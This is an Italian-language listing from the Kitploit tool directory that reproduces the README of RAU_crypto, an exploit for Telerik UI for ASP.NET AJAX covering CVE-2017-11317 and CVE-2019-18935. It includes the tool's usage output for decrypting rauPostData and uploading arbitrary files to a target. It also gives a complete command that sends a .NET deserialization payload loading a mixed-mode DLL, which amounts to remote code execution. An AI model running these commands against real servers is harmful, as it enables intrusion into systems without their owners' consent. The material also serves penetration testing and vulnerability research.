Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE_2019_18935 — Questo progetto per CVE-2019-18935 | Kitploit
Strumenti/GitHubGitHub/thanhuutuan/cve_2019_18935
Strumenti di Crittografia/DecrittografiaGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubthanhuutuan/cve_2019_18935

CVE_2019_18935

Questo progetto per CVE-2019-18935

Vedi Repository
26 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RAU_crypto

Language

Exploit combinato per Telerik UI for ASP.NET AJAX.

  • Caricamento file per CVE-2017-11317 e CVE-2017-11357 - caricherà automaticamente il file
  • Deserializzazione .NET per CVE-2019-18935

Affinché l'exploit funzioni, generalmente hai bisogno di una versione con chiavi hardcoded, oppure devi conoscere la chiave, ad esempio se puoi divulgare il contenuto di web.config. L'exploit consente inoltre la decifrazione e la cifratura dirette del rauPostData utilizzato con Telerik.Web.UI.WebResource.axd?type=rau

Requisiti

  • python >= 3.6 con pycryptodome (https://www.pycryptodome.org/en/latest/src/installation.html) - installato con pip3 install pycryptodome o pip3 install pycryptodomex

Pubblicato su exploit-db (versione vecchia)

  • https://www.exploit-db.com/exploits/43874/

Vedi anche

Il mio altro exploit per Telerik UI (per CVE-2017-9248) potrebbe probabilmente interessarti. È disponibile qui:

  • https://github.com/bao7uo/dp_crypto

Da fare

  • Funzionalità HMAC mancante per le versioni successive.
  • Possibilità di specificare una chiave personalizzata.
  • Argomento da riga di comando per l'esecuzione di una DLL in modalità mista (nel frattempo usa l'esempio di payload di deserializzazione .NET fornito di seguito).
  • Utility separata per testare la DLL in modalità mista.
  • Fornire il codice sorgente/le istruzioni di compilazione per la DLL in modalità mista.
  • Brute force sulle versioni.

Nota: gli ultimi quattro elementi sono completi ma non rilasciati.

Vulnerabilità

La vulnerabilità del caricamento file (CVE-2017-11317) è stata scoperta da altri, credo che i crediti vadano a @straight_blast @pwntester @olekmirosh. Subito dopo l'annuncio, ho incontrato la libreria Telerik durante il mio lavoro, quindi l'ho studiata insieme alla vulnerabilità e ho scritto questo exploit a luglio 2017. Ho anche segnalato CVE-2017-11357 per il relativo riferimento diretto a oggetti insicuro.

https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference

La vulnerabilità di deserializzazione .NET (CVE-2019-18935) è stata scoperta da @mwulftange.

https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization

Utilizzo

root@kitploit:~
$ ./RAU_crypto.py 

RAU_crypto by Paul Taylor / @bao7uo 
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Usage:

Decrypt a ciphertext:               -d ciphertext
Decrypt rauPostData:                -D rauPostData
Encrypt a plaintext:                -e plaintext

Generate file upload rauPostData:   -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file:                        -P c:\\destination\\folder Version c:\\local\\filename url [proxy]

Generate custom payload POST data : -c partA partB
Send custom payload:                -C partA partB url [proxy]

Example URL:               http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version format:    2016.2.504
Example optional proxy:    127.0.0.1:8080

N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS
$

Esempio - decifratura

Screenshot della decifratura

Esempio - caricamento file arbitrario

Screenshot del caricamento

Payload personalizzato (deserializzazione .NET)

Per i dettagli sui payload personalizzati per la deserializzazione .NET, c'è un ottimo articolo di @mwulftange, che ha scoperto questa vulnerabilità, sul blog Code White al seguente link.

  • https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html

Altri link pertinenti.

  • https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
  • https://threatvector.cylance.com/en_us/home/implications-of-loading-net-assemblies.html
  • https://thewover.github.io/Mixed-Assemblies/

Esempio di payload di deserializzazione .NET:

root@kitploit:~
$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau

Per la DLL in modalità mista, vedi il mio altro repository GitHub:

  • https://github.com/bao7uo/MixedUp

Un ringraziamento speciale a @irsdl che ha ispirato la funzionalità dei payload personalizzati.

Scarica lo strumento